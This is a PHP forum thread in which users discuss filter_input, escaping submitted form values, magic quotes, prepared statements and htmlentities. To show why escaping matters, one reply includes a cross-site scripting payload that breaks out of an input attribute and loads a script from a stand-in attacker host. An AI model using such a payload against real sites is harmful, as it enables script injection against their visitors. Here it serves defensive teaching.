$_POST or filtered $_POST?

Hello all,

I’ve been told that:

$_GET, $_POST, $_COOKIE and $_REQUEST are filtered with the default filter. filter_input(INPUT_POST, 'pwd') without additional parameters also uses the default filter.
So there is no difference at all between using $_POST alone and $_POST with filter.

Is this accurate? If so, how should we normally protect $_POST or $_GET values coming from a client script?

htmlentities?

What do you use? And Why?

Thanks in advance,
Márcio

That’s right, which is why it’s typically a good policy to escape the values only at the very last moment, so that you can escape them as is appropriate for the situation.

If you choose not to encode the submitted content, you may end up with this:


<input type="text" name="email" value="this is "a test"">

It may also be possible to submit bad content, such as:

">
<script src="http://blackhat.com/exploit.js"></script>
<p id="Pwned!

which would result in an empty value, and bad stuff happening:


<input type="text" name="email" value="">
<script src="http://blackhat.com/exploit.js"></script>
<p id="Pwned!">

So yes, you should always escape form values. Any and all data from the user must be considered suspect.
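
As a minimal sketch of that advice, the hostile value from the example above can be escaped at the moment it is written into the form. The $email value here is hard-coded for illustration; in a real script it would come from the submitted form.

```php
<?php
// Hypothetical submitted value; in a real form this would come from $_POST['email'].
$email = '"><script src="http://blackhat.com/exploit.js"></script><p id="Pwned!';

// Escape at the moment of output, for the HTML attribute context.
$safe = htmlspecialchars($email, ENT_QUOTES, 'UTF-8');

// The quotes and angle brackets are now entities, so the value stays inside the attribute.
echo '<input type="text" name="email" value="' . $safe . '">';
```

The original $email is left untouched, so it can still be escaped differently for other destinations.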

Hm… so, it seems that we have at least two or three ways for escaping:

a) explicitly calling addslashes on $_POST or $_GET values, and so on;

b) using prepared statements, which do the job for us;

c) using a value object setter that takes our superglobals as arguments, escapes them, and does everything else that needs to be done before we get them.

Sanitization and validation are two different things, and PHP seems to separate them. Can we borrow that separation for our applications, or should we sanitize and validate everything in one layer?

Still, at least conceptually, and despite the 3 distinct layers that Oddz talked about, it seems to me that we need a way to traverse all those layers somehow, in order to unify the error messages displayed to the user, so that we have one place to edit those messages and to centrally manage all user input security policies. No?

To clarify: if you take input from a form to enter into something like a database, you don't do anything to the data except escape it for security reasons, correct? From my experience that should be the process, as you preserve the original data; then when you display it is when you actually use something like htmlentities.

But if you have a form and the user submits it and there is an error because a field has an incorrect value, don't you need to do something like htmlentities to the value so you won't have issues with the form? Meaning, if I type this is "a test" into a form field and submit, and I just echo the value back into the field, I get this is \, or just this is

So don't I have to HTML-encode it instead, so it shows properly in the form field?

Only when you’re expecting a falsey value that’s not null. The type comparison tables can help to understand the differences, as well as to educate about the problems with loose type checking.

When dealing with strings, about the only time is when "0" would be considered to be a valid value, because strangely enough, empty("0") is true. Checking that the value is greater than an empty string can be a useful and meaningful comparison though.


if ($email > '') {
    // do email stuff
}
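
To make the difference concrete, here is a small sketch. The hasValue helper is a hypothetical name used only for illustration; it wraps the greater-than-empty-string comparison, which is a plain string comparison in which every non-empty string sorts after the empty one.

```php
<?php
// Hypothetical helper: true only for a non-empty string, including "0".
function hasValue($value): bool
{
    // Two strings compared with > are ordered like dictionary entries
    // (unless both are numeric), and '' sorts before everything else.
    return is_string($value) && $value > '';
}

var_dump(empty('0'));      // empty() treats the string "0" as empty
var_dump(hasValue('0'));   // the comparison does not
var_dump(hasValue(''));
var_dump(hasValue(null));
```

The is_string check is an addition on top of the bare comparison, so that arrays or other unexpected types are rejected as well.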

Guilty. :x

It’s also often common to see both !empty and isset altogether on the same conditional statement.

According to others however, !empty seems to work fine all by itself.

By using filter_input, isset isn’t an option and === NULL should be used instead?

Under what circumstances would we prefer to verify that a given $_POST or $_GET value isn’t NULL, rather than just !empty?

Sorry, I’m reaching my own limits and I realise that. If you could understand my difficulties from the evident struggle for formulating those questions, then I would see some light over all those subjects.
If not, then, worry not, I will give myself some time.

Thanks a lot,
Márcio

Yes… I realise my question was somewhat unrelated to the initial question, and much more of a “how to design” question. I will ask there then. :wink:

Márcio

filter_input is a function that can be used to get user input and optionally filter it (http://www.php.net/manual/en/filter.filters.php).

What do you use? And Why?

It depends on what you are doing, but in general, prepared statements to input to the db (coupled with any filters or validation checks you need), and at least htmlspecialchars on the output.

A good question. Neither of them throws warnings or errors.

Bad solutions

What does raise a notice (a warning as of PHP 8) is reading an item that was never submitted:


$email = $_POST['email'];

Some people check to see if it exists, and assign the value only then.


if (isset($_POST['email'])) {
    $email = $_POST['email'];
}

But if the email item doesn’t exist, you then fall out of the if statement without having $email assigned at all.

Solutions when filter_input cannot be used

One solution is to assign the value and then check if it contains a bad value:


if (isset($_POST['email'])) {
    $email = $_POST['email'];
}
if (empty($email)) {
    $email = '';
}

Another solution involves using an if/else statement:


if (isset($_POST['email'])) {
    $email = $_POST['email'];
} else {
    $email = '';
}

But my preferred solution, when not using filter_input, is to set up an initial default value, and then to reassign it if the item exists.


$email = '';
if (isset($_POST['email'])) {
    $email = $_POST['email'];
}

Those last three pieces of code ensure that $email always has a value: either the submitted value or, by default, an empty string.

The filter_input solution

The filter_input function simplifies the whole process, and provides better protection. Here’s what you get instead:

Value of the requested variable on success, FALSE if the filter fails, or NULL if the variable_name variable is not set.
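
The three outcomes can be told apart with strict comparisons. The sketch below uses a hypothetical describeResult helper, and it calls filter_var rather than filter_input so that it can be tried without a real form submission; filter_var applies the same filters to a value you already hold.

```php
<?php
// Hypothetical helper that names the three outcomes described above.
function describeResult($result): string
{
    if ($result === null) {
        return 'not set';        // the variable was not submitted at all
    }
    if ($result === false) {
        return 'filter failed';  // submitted, but rejected by the filter
    }
    return 'ok';                 // submitted and accepted
}

// In a web request this would be:
// $email = filter_input(INPUT_POST, 'email', FILTER_VALIDATE_EMAIL);
echo describeResult(filter_var('user@example.com', FILTER_VALIDATE_EMAIL)), "\n";
echo describeResult(filter_var('not an email', FILTER_VALIDATE_EMAIL)), "\n";
echo describeResult(null), "\n";
```

This is why === NULL and === FALSE are the checks to use with filter_input, where isset would be used with $_POST.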

Protection later in your code

Later on in your code, it can be common to check if the variable is empty before using it, which will work regardless of whichever technique is used beforehand.


if (!empty($email)) {
    // do stuff with $email value here
}

There are really three things to concern yourself with when saving user input:

1.) Format
2.) Table compatibility
3.) Dangerous content

Now, depending on the system or field the formatting check may take care of all the above. For example, a validation that makes certain input follows a phone number format will indirectly cover 2 and 3.

When necessary, the table compatibility layer will make sure the data can actually be placed into the table without error. This is a lower-level check that concerns data integrity, data types and uniqueness. For example, user names would be checked at this layer to see if they are unregistered, with proper feedback given to the user when the chosen one is taken. You could also check here that the value selected in a drop-down does in fact reference a row in another table. Now, depending on how well your database is set up, you may not need to worry about some of these items, but it is always good to provide feedback to users on errors. The only way to properly do that is to anticipate and check each circumstance ahead of time.

The lowest level applies to all user input and is about making sure the input isn’t dangerous. This is where you would escape data to make sure it isn’t going to be destructive. You could of course do other security checks as well, but for the most part escaping is the vital one.

With all 3 of these levels, a higher one may take care of concerns that belong to a lower one. For example, validating a phone number format negates an escaping issue when done properly.

However, in many systems the layer used to manipulate the database is separate from the layer used for processing logic. Therefore, it is more concrete and less prone to failure to place security responsibilities with the layer that communicates directly with the storage facility than it is to rely on every outside caller to handle security concerns.

With that said, I’ve never been one to filter the entire post array. I always leave it up to the data layer to handle security issues.

Right, so you should escape form values when displaying them back into a form, but don't you need to revert them back to the original state when entering them into the database? For example, if I have this as a value in a form after I filtered it:


<input type="text" name="title" value="My &quot;title&quot;">

You don’t want to enter the data into the database with the HTML entities; you want it to go in as the original data, which was My "title". You want to preserve the original content. Correct? Because what if I have a search function that searches the title field? Wouldn’t the HTML entities skew the results?
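
A small sketch of the concern, with the title hard-coded for illustration: searching for the quoted word succeeds against the value as typed, but not against an HTML-encoded copy of it.

```php
<?php
// Value as the user typed it; this is what belongs in the database.
$title = 'My "title"';

// HTML-encoded copy, suitable only for writing into a page.
$encoded = htmlspecialchars($title, ENT_QUOTES, 'UTF-8');

// Searching for the quoted word works against the original...
$foundInOriginal = strpos($title, '"title"') !== false;
// ...but the encoded copy no longer contains literal quote characters.
$foundInEncoded = strpos($encoded, '"title"') !== false;

var_dump($foundInOriginal, $foundInEncoded);
```

Storing the original and encoding only when printing avoids the problem, since the encoded form never reaches the database.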

Just the one layer may not do the job. For any subsection it is useful to validate what comes in, and to sanitize what goes out.

I suspect that the people in the PHP Application Design forum will have plenty more to add to this topic.

We sure found a lot of information about those subjects. I do believe, however, that only a few seem to have the discernment to properly divide it by subject and by time, and to organize the excess of misinformation now flooding our dear world wide web. Or, in fewer words: thanks a lot.


About 1)

You are saying that

You can use one of the two following sets

Does this mean that if, to retrieve the values, we do:

$email = filter_input(INPUT_GET, 'email');

we don’t need to use

$_GET['email']

?

For the first set you have commented
// retrieve a value without warnings or errors

Does this mean that the second set, despite the nice filter usage, has the drawback of throwing some warnings?

Thanks again,
Márcio

It’s also often common to see both !empty and isset altogether on the same conditional statement.

According to others however, !empty seems to work fine all by itself.

empty takes care of isset, you only need empty. Just watch for what Paul mentioned: the string (all post/get comes through as strings) “0” is empty.

I lost the first version to a web search (new tab, dammit!) so here’s take two.

1. Getting the values

You can use one of the two following sets of code to retrieve a value:


// safely retrieve a value without filter_input
$email = '';
if (isset($_GET['email'])) {
    $email = $_GET['email'];
}


// filter_input can be used from PHP 5.2 onwards
$email = filter_input(INPUT_GET, 'email');

The benefit of using filter_input is that you can also apply filters to the values. For example, with an email address there is the FILTER_SANITIZE_EMAIL filter.


$email = filter_input(INPUT_GET, 'email', FILTER_SANITIZE_EMAIL);
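
To see what that filter does, the same filter can be applied with filter_var to a value already in hand. The input string below is made up for illustration. Note that sanitizing only strips characters that are not allowed in an email address; it does not check that what remains is a valid address, so a FILTER_VALIDATE_EMAIL check is still worthwhile afterwards.

```php
<?php
// Made-up input with characters that do not belong in an email address.
$raw = ' (user@example.com) ';

// Strips everything except letters, digits and a fixed set of punctuation.
$clean = filter_var($raw, FILTER_SANITIZE_EMAIL);

// Sanitizing is not validating, so check the result separately.
$isValid = filter_var($clean, FILTER_VALIDATE_EMAIL) !== false;

var_dump($clean, $isValid);
```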

2. Magic quotes

None of the above yet protects your code from potentially malicious input. Up to PHP 5.3 it was magic quotes that attempted to provide the protection. That was found to be less than adequate, with mysql_real_escape_string or prepared statements providing better protection, so as of PHP 5.3 magic quotes are officially deprecated, and they were removed altogether in PHP 5.4. This means changing your mindset so that the code you write now will have a better chance of being issue-free later on.

You need to approach things with the assumption that magic quotes are no longer there. If they just-so-happen to be enabled, you need to remove the added slashes from the values, so that you don’t run the risk of double-escaping the values.


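// get_magic_quotes_gpc() was removed in PHP 8, so guard the call
if (function_exists('get_magic_quotes_gpc') && get_magic_quotes_gpc()) {
    $email = stripslashes($email);
}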

There are also many other ways to disable magic quotes, my favourite being to disable them completely at the server, but if your code is going to be run in an unknown environment, you can apply added protection so that it still works as-per-normal, or even dies with an appropriate error message.

3. Handling values

The values that you now have must still be considered to be untrusted, and potentially dangerous. When passed to the database they may contain attempted SQL Injection code, and when passed to the web page they may contain XSS code. Your code needs to now treat them as untrusted values, as they came from an untrusted source, the user. This is not to say that they will contain bad values. It’s only to say that the potential for bad values still exists.

There are some ways to protect against bad values when getting values in, but the only way to provide proper protection is to make sure that the values are safe when they are going out, whether that be to the database, the web page, or other places like email, XML, files, url, etc.

4. Output to database

Sending values to the database is fraught with issues, but if you ensure that your database values are escaped only once, you should be safe. The appropriate ways to do that are to use mysql_real_escape_string at the database query itself, as in the example on the mysql_real_escape_string documentation page (on PHP 7 and later the old mysql extension is gone, so use mysqli_real_escape_string instead), or to use prepared statements with, for example, mysqli_prepare (http://www.php.net/manual/en/mysqli.prepare.php).
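
As a rough sketch of the prepared statement approach: the example below uses PDO with an in-memory SQLite database rather than mysqli, purely so that it runs without a MySQL server, and it assumes the pdo_sqlite extension is available. The table and the hostile input are made up for illustration.

```php
<?php
// Assumption: pdo_sqlite is installed; an in-memory database keeps the sketch self-contained.
$pdo = new PDO('sqlite::memory:');
$pdo->setAttribute(PDO::ATTR_ERRMODE, PDO::ERRMODE_EXCEPTION);
$pdo->exec('CREATE TABLE users (email TEXT)');

// Made-up hostile input.
$email = "x'); DROP TABLE users; --";

// The placeholder keeps the value out of the SQL text, so no manual escaping is needed.
$stmt = $pdo->prepare('INSERT INTO users (email) VALUES (:email)');
$stmt->execute([':email' => $email]);

// The value comes back exactly as submitted, and the table still exists.
$stored = $pdo->query('SELECT email FROM users')->fetchColumn();
var_dump($stored === $email);
```

The same pattern applies with mysqli_prepare and bound parameters; only the connection and binding calls differ.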

5. Output to the page

As you were saying before, htmlentities is useful for outputting values to the page.


echo 'An email has been sent to you at ' .
   '<strong>' . htmlentities($email) . '</strong>';

There is a lot more to be said about these topics, but it’s kinda late for me now (1am), and the topic has been well covered here before, such as:

* magic_quotes_gpc - how to handle in PHP 5.3 and 6.0
* How do I eliminate the \ from MySQL returned data
* html entities?

We might even be encouraged some day to put together a proper reference about all of this.

From my part, thanks a lot for the detailed explanations.
I rest my case. :slight_smile:

Regards,
Márcio

I have not properly understood what checking if a string is greater than an empty string means… because we are in a string context when we use >, are we? But that I must leave for later. Those are heavy subjects, believe it or not. :slight_smile: